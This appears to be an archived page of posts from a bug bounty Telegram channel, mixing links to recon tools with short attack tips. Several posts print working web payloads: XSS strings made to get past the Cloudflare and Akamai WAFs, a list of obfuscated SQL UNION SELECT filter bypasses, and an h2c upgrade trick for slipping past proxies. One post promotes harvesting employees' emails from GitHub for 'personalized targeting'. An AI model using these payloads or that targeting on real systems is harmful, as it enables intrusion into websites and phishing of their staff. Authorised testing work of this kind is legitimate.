15 Sept 2025, 18:27 UTC≈3,800 views11 reactionsread 28 August 2026 Bug Bounty Pro Tip: #H2C Upgrade Bypass
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 r…
❤9👍1🤩1
17 Jul 2025, 20:06 UTC≈5,460 views6 reactionsread 28 August 2026 New bug bounty target! Check out https://investaxes.com/.well-known/security.txt for details on their vulnerability disclosure program. Happy hunting!
❤6
17 Jul 2025, 19:47 UTC≈5,310 views7 reactionsread 28 August 2026 Photo
NEW BUG BOUNTY PLATFORM https://www.hackprove.com/
❤7
3 Jul 2025, 19:49 UTC≈5,560 views2 reactionsread 28 August 2026 CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applications.
https://github.com/musana/CF-Hero
❤2
3 Jul 2025, 19:48 UTC≈5,210 views1 reactionsread 28 August 2026 🔍 Bug Bounty Web Checklist
Track your web pentesting progress by checking each subcategory.
https://nemocyberworld.github.io/BugBountyCheckList/
❤1
3 Jul 2025, 19:47 UTC≈4,780 viewsread 28 August 2026 Shodan Dorks
https://github.com/nullfuzz-pentest/shodan-dorks
3 Jul 2025, 19:45 UTC≈4,580 viewsread 28 August 2026 Photo
APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.
GitHub: https://github.com/d78ui98/APKDeepLens
28 Apr 2025, 19:56 UTC≈5,050 viewsread 28 August 2026 Xss Payload
<input/onmouseover="javaSCRIPT:confirm(1)”
27 Apr 2025, 17:18 UTC≈4,610 views14 reactionsread 28 August 2026 bypass XSS Cloudflare WAF
Encoded Payload:
"><track/onerror='confirm\%601\%60'>
Clean Payload:
"><track/onerror='confirm1'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
👍9🔥4❤1
27 Apr 2025, 17:18 UTC≈3,460 views4 reactionsread 28 August 2026 Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+s…
🔥4
27 Apr 2025, 17:17 UTC≈2,720 views4 reactionsread 28 August 2026 Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
❤4
12 Apr 2025, 19:47 UTC≈3,470 viewsread 28 August 2026 Photo
🔰 Collect emails, usernames from commit history of repos of an org from GitHub for more personalized targeting of employees.
GitHub: ghintel.secrets.ninja
Showing the 12 most recent of 20 posts we hold for @ctftm. View and reaction counts are the latest single reading for each post, not a live figure, and a recent post is still accumulating both. A view count marked ≈ was rounded by Telegram before we ever saw it — t.me prints views in full below 1,000 and to three significant figures above, so ≈1,200,000 means somewhere between 1,150,000 and 1,249,999. Unmarked counts are exact. Text is reproduced from the public post preview and truncated for length.